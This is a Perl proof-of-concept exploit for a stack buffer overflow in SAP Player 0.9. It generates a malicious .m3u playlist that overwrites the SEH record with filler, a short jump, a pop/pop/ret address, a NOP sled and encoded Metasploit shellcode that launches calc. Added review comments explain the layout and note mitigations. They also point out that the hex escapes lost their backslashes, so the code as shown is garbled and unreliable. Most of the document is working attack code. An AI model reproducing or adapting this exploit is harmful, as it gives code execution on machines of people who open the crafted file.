
# Title : SAP Player 0.9 (.m3u) Universal Local BOF Exploit (SEH)
# Published : 2009-09-03
# Author : Platen


#!/usr/bin/perl
#
# Proof-of-concept file generator for the SAP Player 0.9 .m3u stack buffer
# overflow named in the title above.  The script never touches the player
# itself: it only writes a playlist file (expl.m3u) whose single entry is
# long enough to overrun a stack buffer and overwrite the SEH record, in the
# classic layout  filler | next-SEH | SEH handler | NOP sled | payload.
#
# NOTE(review): several string literals below read as "x41", "xEBx06",
# "n" -- these look like "\x41", "\xEB\x06", "\n" with the backslashes
# lost when the listing was extracted.  As written, Perl would emit the
# literal characters 'x41' rather than the byte 0x41.
#
# NOTE(review): no `use strict; use warnings;` -- every variable below is an
# unchecked package global.

print qq(
  ############################################################
  ##            Iranian Pentesters Home                     ##
  ##               Www.Pentesters.Ir                        ##
  ##              PLATEN -[ H.jafari ]-                     ## 
  ## SAP player 0.9 (.m3u) Universal Local BoF Exploit(SEH) ##
  ## http://www.sorinara.com/sap/sap09.exe                  ##
  ## bug found & exploited by:  PLATEN                      ##
  ## E-mail && blog:                                        ##
  ## hjafari.blogspot.com                                   ##
  ## platen.secure[at]gmail[dot]com                         ## 
  ## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder, Snake         ##
  ## and all members in Pentesters.ir                       ##
  ############################################################
);
# Filler: 35496 repetitions of the filler unit (intended as byte 0x41 --
# see the NOTE on escapes above).  The count is presumably the distance
# from the overflowed buffer to the SEH record and is specific to this
# player build; a playlist entry of this size is itself a strong detection
# signal for any .m3u parser.
$junk="x41"x 35496;
# Next-SEH slot: per the original comment, a two-byte short jump followed
# by what look like two NOP pad bytes, so that execution skips forward over
# the handler pointer written next.
$nseh = "xEBx06x90x90"; #short jump over SEH handler
# SEH handler slot: address of a pop/pop/ret sequence ("p/p/r").  SafeSEH,
# SEHOP and DEP are the platform mitigations against exactly this layout;
# the application-side fix is bounds-checking the playlist entry length
# before copying it into the stack buffer.
$seh="x27x4ax01x10"; #universal p/p/r 
# 100-byte NOP sled preceding the payload.
$nop="x90"x 100;
# Payload: Metasploit win32_exec (Size=160, PexFnstenvSub-encoded) whose
# command is `calc` -- a benign local proof-of-concept, not a remote or
# persistent payload.  The ten lines below carry 16 bytes each, which
# agrees with the stated 160-byte size.
# win32_exec - Size=160
#EXITFUNC=seh CMD=calc  
#Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x38".
"x78x73x8ax83xebxfcxe2xf4xc4x90x37x8ax38x78xf8xcf".
"x04xf3x0fx8fx40x79x9cx01x77x60xf8xd5x18x79x98xc3".
"xb3x4cxf8x8bxd6x49xb3x13x94xfcxb3xfex3fxb9xb9x87".
"x39xbax98x7ex03x2cx57x8ex4dx9dxf8xd5x1cx79x98xec".
"xb3x74x38x01x67x64x72x61xb3x64xf8x8bxd3xf1x2fxae".
"x3cxbbx42x4ax5cxf3x33xbaxbdxb8x0bx86xb3x38x7fx01".
"x48x64xdex01x50x70x98x83xb3xf8xc3x8ax38x78xf8xe2".
"x04x27x42x7cx58x2exfax72xbbxb8x08xdax50x88xf9x8e".
"x67x10xebx74xb2x76x24x75xdfx1bx12xe6x5bx78x73x8a";
# NOTE(review): two-arg open on a bareword handle, unchecked for failure,
# and in append mode -- re-running the script appends a second copy to an
# existing expl.m3u instead of replacing it.  The idiomatic form is
#   open my $fh, '>', 'expl.m3u' or die "open expl.m3u: $!";
open(fhandle,'>>expl.m3u');
# Single write of the whole layout, in the order described at the top.
print fhandle $junk.$nseh.$seh.$nop.$shellcode;
# NOTE(review): close is also unchecked, so a buffered write error would
# go unreported.
close(fhandle);
# The leading and trailing "n" appear to be "\n" with the backslash lost.
print "n  [+] File created successfully: expl.m3u n";
